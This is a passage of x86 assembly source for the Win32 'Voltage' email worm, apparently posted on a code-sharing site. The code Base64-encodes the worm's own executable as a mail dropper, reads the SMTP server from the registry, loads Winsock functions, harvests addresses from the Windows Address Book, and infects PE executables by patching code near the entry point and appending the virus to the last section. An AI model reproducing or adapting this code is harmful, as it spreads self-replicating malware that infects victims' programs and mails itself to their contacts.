?? i-worm_win32.voltage病毒源代碼.txt
字號:
rep movsb
jmp _____1
SendDropper:
push 0ffh
lea eax,[ebp + wvltg_exe_path]
push eax
push 0h
call [ebp + GetModuleFileName]
cmp eax,0h
je Base64CreationErr
_____1: ;open it:
push 0h
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0h
push FILE_SHARE_READ
push GENERIC_READ
lea eax,[ebp + wvltg_exe_path]
push eax
call [ebp + CreateFile]
cmp eax,INVALID_HANDLE_VALUE
je Base64CreationErr
mov [ebp + hvirusfile],eax
;get file size:
push 0
push [ebp + hvirusfile]
call [ebp + GetFileSize]
cmp eax,0ffffffffh
je CloseFileErr
mov [ebp + virusfilesize],eax
push eax
xor edx,edx
mov ecx,3h
div ecx
xchg ecx,eax
pop eax
add eax,ecx
mov ecx,25
mul ecx
add eax,400h ;allocate more memory than needed,just for safty
push eax
push GPTR
call [ebp + GlobalAlloc] ;allocate memory
cmp eax,0h
je CloseFileErr
mov [ebp + base64outputmem],eax
;map file into the memory
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push dword ptr [ebp + hvirusfile]
call [ebp + CreateFileMapping]
cmp eax,0h
je B64FreeMemErr
mov [ebp + hvirusmap],eax
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push dword ptr [ebp + hvirusmap]
call [ebp + MapViewOfFile]
cmp eax,0h
je B64CloseMapErr
mov [ebp + hvirusinmem],eax
xchg eax,esi
mov edi,[ebp + base64outputmem]
mov ecx,[ebp + virusfilesize]
call Base64
mov [ebp + sizeofbase64out],eax
push [ebp + hvirusinmem]
call [ebp + UnMapViewOfFile]
push [ebp + hvirusmap]
call [ebp + CloseHandle]
push [ebp + hvirusfile]
call [ebp + CloseHandle]
stc
ret
B64CloseMapErr:
push dword ptr [ebp + hvirusmap]
call [ebp + CloseHandle]
B64FreeMemErr:
push dword ptr [ebp + base64outputmem]
call [ebp + GlobalFree]
CloseFileErr:
push [ebp + hvirusfile]
call [ebp + CloseHandle]
Base64CreationErr:
clc
ret
wvltg_exe_path db 0ffh dup(0)
hvirusfile dd 0
virusfilesize dd 0
base64outputmem dd 0
sizeofbase64out dd 0
hvirusmap dd 0
hvirusinmem dd 0
;input:
;esi - data source
;edi - where to write encoded data
;ecx - size of data to encode
;output:
;eax - size of encoded data
Base64: xor edx,edx
push edx
@3Bytes:push edx
xor eax,eax
xor ebx,ebx
or al,byte ptr [esi]
shl eax,8h
inc esi
or al,byte ptr [esi]
shl eax,8h
inc esi
or al,byte ptr [esi]
inc esi
push ecx
mov ecx,4h
@outbit:mov ebx,eax
and ebx,3fh ;leave only 6 bits
lea edx,[ebp + Base64Table]
mov bl,byte ptr [ebx + edx]
mov byte ptr [edi + ecx - 1h],bl
shr eax,6h
loop @outbit
pop ecx
sub ecx,2h
add edi,4h
pop edx
add edx,4h
add dword ptr [esp],4h
cmp ecx,3h
jb ExitB64
cmp edx,4ch ;did we need to add new line ?
jne DoLoop
xor edx,edx
mov word ptr [edi],0a0dh
add edi,2h
add dword ptr [esp],2h
DoLoop: loop @3Bytes
ExitB64:pop eax
ret
Base64Table db "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
GetSMTPServer:
;get the default smtp server from the registry
mov dword ptr [ebp + hkey],0h
lea eax,[ebp + hkey]
push eax
xor eax,eax
push eax
push eax
lea eax,[ebp +smtp_key]
push eax
push HKEY_CURRENT_USER
call [ebp + RegOpenKeyEx]
cmp eax,ERROR_SUCCESS
jne SmtpGetErr
lea eax,[ebp + SizeOfAccountNum]
push eax
lea eax,[ebp + accountnum]
push eax
xor eax,eax
push eax
push eax
lea eax,[ebp + default_mail]
push eax
push dword ptr [ebp + hkey]
call [ebp + RegQueryValueEx]
cmp eax,ERROR_SUCCESS
jne CloseKeyErr
lea eax,[ebp + accountnum]
push eax
lea eax,[ebp + accountkey]
push eax
call [ebp + lstrcat]
cmp eax,0h
je CloseKeyErr
lea eax,[ebp + hkey]
push eax
push KEY_READ
push 0h
lea eax,[ebp + accountkey]
push eax
push dword ptr [ebp + hkey]
call [ebp + RegOpenKeyEx]
cmp eax,ERROR_SUCCESS
jne CloseKeyErr
lea eax,[ebp + SizeOfSMTPServerAdd]
push eax
lea eax,[ebp + SmtpServerAdd]
push eax
xor eax,eax
push eax
push eax
lea eax,[ebp + smtp_server]
push eax
push dword ptr [ebp + hkey]
call [ebp + RegQueryValueEx]
cmp eax,ERROR_SUCCESS
jne CloseKeyErr
push dword ptr [ebp + hkey]
call [ebp + RegCloseKey]
stc
ret
CloseKeyErr:
push dword ptr [ebp + hkey]
call [ebp + RegCloseKey]
SmtpGetErr:
clc
ret
smtp_key db "Software\Microsoft\Internet Account Manager",0
default_mail db "Default Mail Account",0
smtp_server db "SMTP Server",0
SmtpServerAdd db 75 dup(0)
SizeOfSMTPServerAdd dd 75
accountnum db 75 dup(0)
SizeOfAccountNum dd 75
accountkey db "Accounts\",75 dup(0)
GetWinsockApis:
lea eax,[ebp + WinsockDll]
push eax
call [ebp + LoadLibrary]
cmp eax,0h
je GetWinsockApisErr
mov dword ptr [ebp + hWinsock],eax
xchg eax,edx
mov ecx,NumberOfWinsockFunctions
lea eax,[ebp + winsock_functions_sz]
lea ebx,[ebp + winsock_functions_addresses]
call get_apis
ret
GetWinsockApisErr:
clc
ret
WinsockDll db "ws2_32.dll",0
hWinsock dd 0
winsock_functions_sz:
_WSAStartup db "WSAStartup",0
_WSACleanup db "WSACleanup",0
_socket db "socket",0
_gethostbyname db "gethostbyname",0
_connect db "connect",0
_recv db "recv",0
_send db "send",0
_htons db "htons",0
_closesocket db "closesocket",0
winsock_functions_addresses:
WSAStartup dd 0
WSACleanup dd 0
socket dd 0
gethostbyname dd 0
connect dd 0
recv dd 0
send dd 0
htons dd 0
closesocket dd 0
NumberOfWinsockFunctions equ 9
ScanWAB: ;scan the windows address book for email addresses
mov dword ptr [ebp + hkey],0h
lea eax,[ebp + hkey]
push eax
xor eax,eax
push eax
push eax
lea eax,[ebp + WAB_Location]
push eax
push HKEY_CURRENT_USER
call [ebp + RegOpenKeyEx]
cmp eax,ERROR_SUCCESS
jne WabScanErr
lea eax,[ebp + SizeOfWAB_PATH]
push eax
lea eax,[ebp + WAB_Path]
push eax
xor eax,eax
push eax
push eax
push eax
push [ebp + hkey]
call [ebp + RegQueryValueEx] ;get the wab file location
cmp eax,ERROR_SUCCESS
jne CloseWABkeyAndExit
push dword ptr [ebp + hkey]
call [ebp + RegCloseKey]
;open the wab file :
xor eax,eax
push eax
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push eax
push FILE_SHARE_READ
push GENERIC_READ
lea eax,[ebp + WAB_Path]
push eax
call [ebp + CreateFile]
cmp eax,INVALID_HANDLE_VALUE
je WabScanErr
mov dword ptr [ebp + hWabFile],eax
;map the wab file :
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push dword ptr [ebp + hWabFile]
call [ebp + CreateFileMapping]
cmp eax,0h
jne MapWab
ErrCMF: push dword ptr [ebp + hWabFile] ;error close wab file
call [ebp + CloseHandle]
jmp WabScanErr
MapWab: mov [ebp + hWabMap],eax
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push dword ptr [ebp + hWabMap]
call [ebp + MapViewOfFile]
cmp eax,0h
jne ReadAddresses
ErrCWM: push dword ptr [ebp + hWabMap] ;error close wab map
call [ebp + CloseHandle]
jmp ErrCMF
ReadAddresses:
mov [ebp + hWabMapBase],eax
mov ax,word ptr [eax + 64h] ;get number of email addresses
cmp ax,1h
jnbe AllocAddMem
ErrUWF: push dword ptr [ebp + hWabMapBase] ;error unmap wab file
call [ebp + UnMapViewOfFile]
jmp ErrCWM
AllocAddMem:
mov word ptr [ebp + NumberOfMailAddresses],ax
mov cx,44h ;every mail address allocated 68 bytes
mul cx ;ax = size of allocated memory
xor ebx,ebx
xchg ax,bx
push ebx
push GPTR
call [ebp + GlobalAlloc]
cmp eax,0h
je ErrUWF
mov [ebp + hMailAddresses],eax
xchg eax,ebx
xor ecx,ecx
mov eax,[ebp + hWabMapBase]
mov cx,word ptr [ebp + NumberOfMailAddresses]
add eax,[eax + 60h] ;goto start of emails
NxtMail:push ecx
mov ecx,44h
CpyMail:cmp byte ptr [eax],0h
je MovNext
mov dl,byte ptr [eax]
mov byte ptr [ebx],dl
inc ebx
add eax,2h
dec ecx
loop CpyMail
MovNext:add eax,ecx
inc ebx
mov byte ptr [ebx],0h
pop ecx
loop NxtMail
push dword ptr [ebp + hWabMapBase]
call [ebp + UnMapViewOfFile]
push dword ptr [ebp + hWabMap]
call [ebp + CloseHandle]
push dword ptr [ebp + hWabFile]
call [ebp + CloseHandle]
ret
CloseWABkeyAndExit:
push dword ptr [ebp + hkey]
call [ebp + RegCloseKey]
WabScanErr:
ret
WAB_Location db "Software\Microsoft\WAB\WAB4\Wab File Name",0
WAB_Path db 0ffh dup(0)
SizeOfWAB_PATH dd 0ffh
hWabFile dd 0
hWabMap dd 0
hWabMapBase dd 0
hMailAddresses dd 0
NumberOfMailAddresses dw 0
ExecuteFile:
mov dword ptr [ebp + cb],SizeOfStartupinfo
lea eax,[ebp + Startupinfo]
push eax
call [ebp + GetStartupInfo]
lea eax,[ebp + Process_Information]
push eax
lea eax,[ebp + Startupinfo]
push eax
lea eax,[ebp + FileDirectory]
push eax
xor eax,eax
push eax
push eax
push eax
push eax
push eax
lea eax,[ebp + CommandLine]
push eax
lea eax,[ebp + FileToInfect]
push eax
call [ebp + CreateProcess]
ret
Process_Information:
hprocess dd 0
hthread dd 0
dwprocessid dd 0
dwthreadid dd 0
Startupinfo:
cb dd 0
lpReserved dd 0
lpDesktop dd 0
lpTitle dd 0
dwX dd 0
dwY dd 0
dwXSize dd 0
dwYSize dd 0
dwXCountChars dd 0
dwYCountChars dd 0
dwFillAttribute dd 0
dwFlags dd 0
wShowWindow dw 0
cbReserved2 dw 0
lpReserved2 dd 0
hStdInput dd 0
hStdOutput dd 0
hStdError dd 0
SizeOfStartupinfo equ $-Startupinfo
InfectFile:
;*********************Debug C0de*******************************
IF DEBUG
push MB_YESNO
lea eax,[ebp + warning]
push eax
lea eax,[ebp + FileToInfect]
push eax
push 0h
call [ebp + MessageBox]
cmp eax,IDYES
jne ExitInfect
ENDIF
;**************************************************************
call CheckFileName
jnc ExitInfect
clc
call CheckSFPFile
jnc ExitInfect
call RemoveFileAttributes
call OpenFile
jnc ExitInfect
mov eax,[ebp + mapbase]
cmp word ptr [eax],"ZM" ;check mz sign
jne ExitWithoutInfection
add eax,[eax + 3ch]
cmp word ptr [eax],"EP" ;check pe sign
jne ExitWithoutInfection
push eax ;save pe header offset in the stack
mov cx,word ptr [eax + 16h] ;get flags
and cx,2000h
cmp cx,2000h ;is dll ?
jne nodll ;infect only executeables
pop eax ;restore stack
jmp ExitWithoutInfection
nodll: mov ecx,[eax + 34h] ;get image base
mov [ebp + ProgramImageBase],ecx ;save image base
movzx ecx,word ptr [eax + 6h] ;get number of sections
mov ebx,[eax + 74h]
shl ebx,3h
add eax,ebx
add eax,78h ;goto first section header
@nexts: mov ebx,[eax + 24h] ;get section flags
and ebx,20h
cmp ebx,20h ;is code section ?
je FoundCS
add eax,28h
loop @nexts
pop eax ;restore stack
jmp ExitWithoutInfection
FoundCS:mov ebx,[eax + 10h] ;get section size of raw data
sub ebx,[eax + 8h]
cmp ebx,0beh ;check for minimum decryptor size
ja ____1
pop eax ;restore stack
jmp ExitWithoutInfection
____1: mov ecx,[eax + 8h] ;get section vitrual size
mov ebx,ecx ;get section virtual size
add ebx,[eax + 14h] ;add to it pointer raw data rva
add ebx,[ebp + mapbase] ;convert it to va
mov [ebp+WhereToWriteDecryptor],ebx ;set where to write decryptor
mov ebx,dword ptr [esp] ;get pe header
push eax ;save pointer to code section header
push ecx ;save size of code section
mov eax,[ebx + 28h] ;get entry point rva
add eax,[ebp + mapbase] ;convert it to va
mov ecx,64h ;100 bytes
call ScanAndPatch ;try to patch instruction that close to EP first
jnc patch2 ;if fail try some other thing...
add esp,8h ;restore stack
jmp ____2
patch2: mov ecx,64h ;100 bytes
mov eax,[esp + 8h] ;get pe header
mov eax,[eax + 28h] ;get program entry point rva
add eax,[ebp + mapbase] ;convert it to va
sub eax,0c00h ;it work with some programs :)
call ScanAndPatch
jnc all_sec ;if we fail scan all code section
add esp,8h ;restore stack
jmp ____2
all_sec:pop ecx ;restore size of code section
pop eax ;restore pointer to code section header
mov eax,[eax + 14h]
add eax,[ebp + mapbase] ;goto section raw data
call ScanAndPatch
jc ____2
pop eax ;restore stack
jmp ExitWithoutInfection
____2: mov eax,dword ptr [esp] ;get pe header
xor ecx,ecx
mov cx,word ptr [eax + 6h] ;get number of sections
dec ecx
mov ebx,[eax + 74h]
shl ebx,3h
add eax,ebx
add eax,78h
@nexts2:add eax,28h
loop @nexts2 ;goto last section header
or [eax + 24h],0C0000000h ;set section flags to readable\writeable
add dword ptr [eax + 8h],VirusSize ;add virus size to section virtual size
xchg eax,ebx
mov eax,[ebx + 8h] ;get section new virtual size
mov ecx,dword ptr [esp] ;get pe header
mov ecx,[ecx + 3ch] ;get file alignment
?? 快捷鍵說明
復(fù)制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -